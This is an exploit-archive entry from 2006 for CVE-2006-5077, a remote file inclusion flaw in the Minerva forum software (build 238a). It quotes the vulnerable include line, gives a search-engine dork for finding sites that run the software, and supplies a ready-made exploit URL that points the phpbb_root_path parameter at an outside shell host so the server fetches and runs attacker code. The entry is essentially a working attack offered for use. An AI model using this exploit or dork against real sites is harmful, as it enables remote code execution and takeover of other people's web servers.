Minerva 2.0.21 build 238a - 'phpbb_root_path' File Inclusion



EKU-ID: 10434 CVE: OSVDB-29463;CVE-2006-5077 OSVDB-ID:
Author: SHiKaA Published: 2006-09-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#==============================================================================================
#Minerva <= v238 (phpbb_root_path) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://prdownloads.sourceforge.net/minerva/Minerva-238a.zip?download
#
#Version : All Versions
#
#================================================================================================
#
#Dork : "Powered by Minerva"
#
#================================================================================================
#Bug in : admin/admin_topic_action_logging.php
#
#Vlu Code :
#--------------------------------
#
# if ( !empty($setmodules) )
#{
#    include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_admin_topic_action_logging.' . $phpEx);
#    $module['Forums']['Action_Logging'] = basename(__FILE__);
#    return;
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & HACKERS PAL & XoRon & Simoo & Saudi HAckerz
==================================================================================================

# milw0rm.com [2006-09-25]